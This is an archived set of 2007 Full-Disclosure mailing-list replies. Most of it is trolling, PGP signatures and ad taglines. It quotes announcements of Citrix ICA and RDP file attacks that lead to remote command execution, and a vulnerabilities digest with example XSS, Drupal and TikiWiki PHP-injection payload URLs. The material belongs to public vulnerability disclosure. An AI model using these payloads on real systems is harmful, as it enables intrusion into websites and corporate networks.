-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SHUT UP VLADIS On Wed, 10 Oct 2007 11:47:23 -0400 pdp (architect) [EMAIL PROTECTED] wrote: http://www.gnucitizen.org/blog/0day-hacking-secured-citrix-from- outside In the true spirit of GNUCITIZEN half(partial)-disclosure initiative, we announce that it is possible to gain user access level on integrated remote CITRIX servers. The bug/feature does not relay on any client/server vulnerabilities nor client/server misconfiguration issues. All an attacker needs to do to exploit the weakness is to lure a victim, part of an integrated network, to a malicious website or trick them into opening specially crafted ICA files. The attack results into remote command execution with the access level of the current user. The success of the attack relays on the fact that the victim (the proxy) is part of a CITRIX ring to which he/she can perform pass through authentication. Once a connection is instantiated, the victim will unwillingly and transparently login into CITIRIX and perform several commands specified by the attacker. The attacker can simply instruct the remote desktop to download files from a remote TFTP server and execute them locally. Once the attack is performed, the local connection is terminated and the CITRIX session is cleared. No user interaction is required! CAUTION!!! The attack can be used to circumvent/bypass border firewalls and sneak into private networks. This attack is of type CRSF (Cross-site Request forgery), although it does not relay on Web bugs. The attack vector works flawlessly on IE and Firefox (when configured correctly). It also works with any email client or other types of file sharing mechanisms. All versions of CITRIX and CITRIX client are affected. The attack may fail on certain setups. If you manage to re-discover the type of vulnerability outlined in this post, we encourage you to keep it private. Give some time for the folks at CITRIX to react. Currently, I am not aware of any remedy against the attack. Given CITRIX's popularity among corporations and big organizations, it is highly recommended to take this warning with extra caution. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcNFHoACgkQ+dWaEhErNvQM6AP/ekt3CCtqTxrnVyfYRDz57l9oeJVU vIcKTIuERgLNLSCGdl21CqgAC2KinIfJaK/70KtV/P62Y5spou5/z4owCKNl8iP6czcp 36cXOwpL4+vHsTTebs4onGTDw7TZnSDf2YA+02kk58NYTjEwiav6MzY+pep64teQCj1h 7Sz/9Kc= =nCB2 -END PGP SIGNATURE- -- Click here to save up to 50% off a quality steel building. http://tagline.hushmail.com/fc/Ioyw6h4esimyMWnRSMH37RdqH4pxtUNm1CNPeAwNOoshCui4UuKTva/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Remote Desktop Command Fixation Attacks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SHUT UP VLADIS IF ANYONE CARED THEY WOULD JUST FREQUENT YOUR BLOG GET OFF THIS LIST THIS IS FOR SERIOUS SECURITY MATTERS ONLY On Wed, 10 Oct 2007 07:14:32 -0400 pdp (architect) [EMAIL PROTECTED] wrote: http://www.gnucitizen.org/blog/remote-desktop-command-fixation- attacks Security in depth does not exist! No matter what you do, dedicated attackers will always be able to penetrate your network. Seriously! Information security is mostly about risk assessment and crisis management. When it comes to exploitative penetration testing, I relay on tactics rather then exploits. I've already talked about how insecure Remote Desktop service could be. In this post I will show you how easy it is to compromise a well protected Windows Terminal or CITRIX server with a simple social engineering attack and some knowledge about the platform we are about to exploit. The attack is rather simple. All the bad guys have to do is to compose a malicious RDP (for Windows Terminal Services) or ICA (for CITRIX) file and send it to the victim. The victim is persuaded to open the file by double clicking on it. When the connection is established, the user will enter their credentials to login and as such let the hackers in. Vicious! I have a more detailed explanation about the tactics behind this attack. Because I don't want to spam people with tones of text, I just included a link which you can follow. Hope that this is useful and at the same time eye opening, not that it is something completely amazing. But it does work and it works well. cheers. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcNFGgACgkQ+dWaEhErNvS4wwQAj8LqbxzIYoXodiXgspcs/YDG0/a8 oNPk3PsmOKHp7N7jVObIEDPjCgGHMRrPfHIEjys5EBTkVr/wq7/y6XPQLdyzIu5VyFE2 04q7slbdkrfImgByVX2itNYDJ5JlbzqrakxxZ9TVrNqqXtjWhw4IN90jDMo8tLoQT0V4 7xtyuiU= =mlsP -END PGP SIGNATURE- -- Click for free info on business schools, $150K/ year potential. http://tagline.hushmail.com/fc/Ioyw6h4dC6kbhaI6CLIgyWpO60jMWLXpHtbVzuYHwGilHWig7GUYZK/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities digest
before 2.0:
gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-
gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-
SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-
For Firefox 2.0:
gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-
gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-
SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-
According to author, it's possible to execute script in both
local zone
and context of gopher site.
12. ShAnKaR reports PHP Zend Hash vulnerability exploitation
vector
with Drupal = 5.2.
Example:
http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal
_eval_menu[items][][type]=-1-312030023=1q=1/?phpinfo();
Original message (in Russian):
http://securityvulns.ru/Sdocument137.html
13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.
Example: http://www.example.com/tikiwiki/tiki-
graph_formula.php?w=1h=1s=1min=1max=2f[]=x.tan.phpinfo()t=png
title=
Original message (in Russian):
http://securityvulns.ru/Sdocument162.html
Also, multiple vulnerabilities were reported in English by
:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo-{ ^ }-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The
Beatles)
+-o66o--+ /
|/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.5
wpwEAQECAAYFAkcNIXUACgkQ+dWaEhErNvSx3AP8CerSijQ2isO5LY36fadxrILLiQok
XJi0X3Sa+AooEb2m9if9CdMhel7A3a4yyBMqVOWfWF1hbxccpeNS0Fi1OKXNoYwMpRIe
PKST+uLl+dMxMKicDIMkRo4xyVc76+X/uq5b5IAk4vrR27CX/4yFHBboDK3cDptsQ9C6
6LtRXXA=
=tavm
-END PGP SIGNATURE-
--
Discount Online Trading - Click Now!
http://tagline.hushmail.com/fc/Ioyw6h4dPYvcpmGb9tTkWB5jLIFiSCd0JeGTaxcz8UO3dwnuZGxWsg/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Core Impact 7.5 Web App pen-testing framework, as good as the hype?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mad technical! On Sun, 07 Oct 2007 19:55:24 -0400 Dude VanWinkle [EMAIL PROTECTED] wrote: On 10/7/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dude, your hacker name sucks, Van Winkle. Thats because its not a hacker handle, but an email address. It is used to tag outgoing smtp traffic for delivery to my mailbox for later retrieval (by me) over the Internet. Glad I could help you with that, -JP -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcLmA4ACgkQ+dWaEhErNvSa5wP8CUO03UvlJuOcYlRH4vAVD9DpOJt3 bDCw/T+61/E71ggDI+gBtQiS+VrPQ9PgLLDNcwwPk6dWByWVXdCMkXToCJS//mOFUIrH IdkcG9v7ToeJYDeCeKtS7e20hQ/aqw74w9ZbCTnZk2HKKYUGL7/Hd0Sv/MUaa27C4FmZ TA/7pBw= =6n+f -END PGP SIGNATURE- -- Click to find great rates on home insurance, save big, shop here. http://tagline.hushmail.com/fc/Ioyw6h4d8gYrf2XWdOd3p1WkcIp6AKEEwZaK688Q4bfeXelfnhhSuE/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] UNSUBSCRIBE
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SHUT UP VLADIS On Tue, 09 Oct 2007 12:14:08 -0400 [EMAIL PROTECTED] wrote: On Tue, 09 Oct 2007 10:26:17 +0530, sushil Agarwal said: UNSUBSCRIBE Read RFC2369, then ponder the headers of any message from the list, and wait for enlightenment. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcLwfsACgkQ+dWaEhErNvQnvAP/ZFgpIsnwdNP3nkK1gWT8VwmXjOuK 3nhqpJUjKTwP4/2OmKWtMjIdYjPFOGRzwo3dPhKQ3MmXDAm40GQ63w4lwkQdch5oSWfA CzJ/Fbv4gVRS2vfoF14cfgCgY4rGqFg+eEaDO6MAZnds8Da0tYO4HADcZWIiW07Y9CjT 1syYzGk= =/7Yz -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Core Impact 7.5 Web App pen-testing framework, as good as the hype?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What do you mean? On Tue, 09 Oct 2007 21:18:58 -0400 Dude VanWinkle [EMAIL PROTECTED] wrote: Sorry, I didnt mean to go over your head. I will dumb it down for you next time. -JP On 10/9/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mad technical! On Sun, 07 Oct 2007 19:55:24 -0400 Dude VanWinkle [EMAIL PROTECTED] wrote: On 10/7/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dude, your hacker name sucks, Van Winkle. Thats because its not a hacker handle, but an email address. It is used to tag outgoing smtp traffic for delivery to my mailbox for later retrieval (by me) over the Internet. Glad I could help you with that, -JP -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcLmA4ACgkQ+dWaEhErNvSa5wP8CUO03UvlJuOcYlRH4vAVD9DpOJt 3 bDCw/T+61/E71ggDI+gBtQiS+VrPQ9PgLLDNcwwPk6dWByWVXdCMkXToCJS//mOFUIr H IdkcG9v7ToeJYDeCeKtS7e20hQ/aqw74w9ZbCTnZk2HKKYUGL7/Hd0Sv/MUaa27C4Fm Z TA/7pBw= =6n+f -END PGP SIGNATURE- -- Click here to obtain free information on accredited degrees. http://tagline.hushmail.com/fc/Ioyw6h4dDpFsvwQOTccUyPqMeQy7KdzZkSuy 0Ufce4JetifU5BBFJd/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcMKeAACgkQ+dWaEhErNvT9HgP+PCZcei6cwt7i0ldn74P/wu49Ng0o pLFjBW6HeUiu4YwI6gPAI/WrrYly+NazXHz9/eA+09z3YYZALUBzEri1ljinuBCiCWqb UFkz2mT3ega72hbmZ7X7tR7eM/jaTcVHQmoFNp6KtqvljGgPGf3EEKB++kQ1VtUmqZgO Kw8WwBw= =hTVJ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
